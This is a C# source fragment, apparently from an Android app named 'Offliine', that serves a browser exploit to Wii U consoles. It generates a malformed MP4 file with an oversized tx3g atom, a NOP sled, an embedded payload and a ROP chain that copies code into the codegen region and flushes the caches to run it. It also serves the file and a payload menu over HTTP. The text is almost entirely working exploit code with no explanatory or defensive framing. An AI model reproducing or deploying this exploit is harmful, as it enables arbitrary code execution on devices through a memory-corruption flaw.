private static void _memcpy(int dest, int src, int size, SystemVersion version, OutputStream output)
{
try
{
_callFunction(version, version.Constants.Memcpy(), dest, src, size, 0, 0, output);
}
catch (Exception e)
{
Log.Debug("Offliine", e.Message);
}
}
private static void _osSwitchCodeGenMode(int mode, SystemVersion version, OutputStream output)
{
try
{
_callFunction(version, version.Constants.OsSwitchSecCodeGenMode(), mode, 0, 0, 0, 0, output);
}
catch (Exception e)
{
Log.Debug("Offliine", e.Message);
}
}
private static void _icInvalidateRange(int addr, int size, SystemVersion version, OutputStream output)
{
try
{
_callFunction(version, version.Constants.IcInvalidateRange(), addr, size, 0, 0, 0, output);
}
catch (Exception e)
{
Log.Debug("Offliine", e.Message);
}
}
private void _serveHax(SystemVersion version, Stream output, string payloadName)
{
var writer = new BufferedWriter(new OutputStreamWriter(output));
_writeHeader(writer, "video/mp4");
if (StageFright.Serve(new OutputStreamAdapter(output), version, payloadName))
{
Log.Debug("Offliine", payloadName);
}
writer.Close();
}
private static void _copyCodebinToCodegen(int codegenAddr, int sourceAddr, int payloadSize,
SystemVersion version, OutputStream output)
{
try
{
_osSwitchCodeGenMode(0, version, output);
_memcpy(codegenAddr, sourceAddr, payloadSize, version, output);
_osSwitchCodeGenMode(1, version, output);
_dcFlushRange(codegenAddr, payloadSize, version, output);
_icInvalidateRange(codegenAddr, payloadSize, version, output);
}
catch (Exception e)
{
Log.Debug("Offliine", e.Message);
}
}
private static void _callFunction(SystemVersion version, int function, int r3, int r4, int r5, int r6, int r28,
OutputStream output)
{
try
{
_popr24Tor31(r6, r5, 0, version.Constants.Callr28PopR28ToR31(), function, r3, 0, r4, version, output);
Util.WriteU32(version.Constants.Callfunc(), output);
Util.WriteU32(r28, output);
Util.WriteU32(0, output);
Util.WriteU32(0, output);
Util.WriteU32(0, output);
Util.WriteU32(0, output);
}
catch (Exception e)
{
Log.Debug("Offliine", e.Message);
}
}
private void _serveWebPage(Stream output, SystemVersion version)
{
var writer = new OutputStreamWriter(output);
HtmlHelper.BeginHtml(writer);
HtmlHelper.BeginBody(writer);
HtmlHelper.CreateHeader1(writer, "Offliine");
foreach (var payload in MainActivity.PayloadNames)
{
if (MainActivity.FoundPayloads[payload.Key].Contains(version.PayloadVersions[0] + ".bin"))
{
HtmlHelper.CreateButton(writer, payload.Key, payload.Value);
}
}
HtmlHelper.EndBody(writer);
HtmlHelper.EndHtml(writer);
writer.Flush();
}
public static byte[] Generate(int heapAddr, SystemVersion version, int sourceAddr)
{
try
{
var payloadSize = 131072;
var codegenAddr = 25165824;
var output = new ByteArrayOutputStream();
_switchToCore1(version, output);
_copyCodebinToCodegen(codegenAddr, sourceAddr, payloadSize, version, output);
_popr24Tor31(version.Constants.OsFatal(), version.Constants.Exit(), version.Constants.OsDynLoadAcquire(),
version.Constants.OsDynLoadFindExport(), version.Constants.OsSnprintf(), sourceAddr, 8, heapAddr,
version, output);
Util.WriteU32(codegenAddr, output);
Util.WriteU32(0, output);
_copyCodebinToCodegen(codegenAddr, sourceAddr, payloadSize, version, output);
_popr24Tor31(version.Constants.OsFatal(), version.Constants.Exit(), version.Constants.OsDynLoadAcquire(),
version.Constants.OsDynLoadFindExport(), version.Constants.OsSnprintf(), sourceAddr, 8, heapAddr,
version, output);
Util.WriteU32(codegenAddr, output);
output.Close();
return(output.ToByteArray());
}
catch (Exception e)
{
Log.Debug("Offliine", e.Message);
}
return(null);
}
public static bool Serve(OutputStream output, SystemVersion version, string payloadName)
{
var tx3GSize = 32768;
if ((version == SystemVersions.Eu532) || (version == SystemVersions.Us532) || (version == SystemVersions.Jp532))
{
tx3GSize = 30720;
}
var tx3GRopStart = tx3GSize - 2048;
var payloadSourceAddr = 341237032;
var payloadStream = new ByteArrayOutputStream();
var ropChain = RopChain.Generate(payloadSourceAddr - 4096, version, payloadSourceAddr);
Util.WriteU32(24, payloadStream);
Util.WriteU32(1718909296, payloadStream);
Util.WriteU32(862416950, payloadStream);
Util.WriteU32(256, payloadStream);
Util.WriteU32(1769172845, payloadStream);
Util.WriteU32(862409526, payloadStream);
Util.WriteU32(tx3GSize + 4096, payloadStream);
Util.WriteU32(1836019574, payloadStream);
Util.WriteU32(108, payloadStream);
Util.WriteU32(1677721600, payloadStream);
payloadStream.Write(Util.ToArray("00000000C95B811AC95B811AFA0002580000022D000100000100000000000000000000000000FFFFF1000000000000000000000000010000000000000000000000000000400000000000000000000000000015696F6473000000001007004FFFFF2803FF"));
Util.WriteU32(tx3GSize + 2048, payloadStream);
Util.WriteU32(1953653099, payloadStream);
Util.WriteU32(92, payloadStream);
Util.WriteU32(1953196132, payloadStream);
payloadStream.Write(Util.ToArray("00000001C95B811AC95B811A00000001000000000000022D000000000000000000000000010000000001000000000000000800000000000000010000000000000000000000000000400000000000100000000000"));
Util.WriteU32(tx3GSize, payloadStream);
Util.WriteU32(1954034535, payloadStream);
for (var i = 0; i < tx3GSize - 8; i += 4)
{
if (i < 24576)
{
if (i < 4096)
{
Util.WriteU32(1610612736, payloadStream);
}
else if (i < 20480)
{
var payload = Payload.Generate(version, payloadName);
payloadStream.Write(payload);
i += payload.Length - 4;
if (i + 4 >= 24576)
{
return(false);
}
while (i + 4 < 20480)
{
Util.WriteU32(-1869574000, payloadStream);
i += 4;
}
}
else
{
Util.WriteU32(1482184792, payloadStream);
}
}
else if (i < tx3GRopStart)
{
Util.WriteU32(version.Constants.PopjumplrStack12(), payloadStream);
}
else if (i == tx3GRopStart)
{
Util.WriteU32(version.Constants.PopjumplrStack12(), payloadStream);
Util.WriteU32(1212696648, payloadStream);
i += 8;
payloadStream.Write(ropChain);
i += ropChain.Length - 4;
}
else
{
Util.WriteU32(1212696648, payloadStream);
}
}
Util.WriteU32(453, payloadStream);
Util.WriteU32(1835297121, payloadStream);
Util.WriteU32(1, payloadStream);
Util.WriteU32(1954034535, payloadStream);
Util.WriteU32(1, payloadStream);
Util.WriteU32((int)(4294967296L - tx3GSize), payloadStream);
for (var i = 0; i < 8192; i += 4)
{
Util.WriteU32(-2070567244, payloadStream);
}
var payloadBytes = payloadStream.ToByteArray();
output.Write(Encoding.ASCII.GetBytes(Integer.ToHexString(payloadBytes.Length) + "\r\n"));
output.Write(payloadBytes);
output.Write(Encoding.ASCII.GetBytes("\r\n0\r\n\r\n"));
payloadStream.Close();
return(true);
}
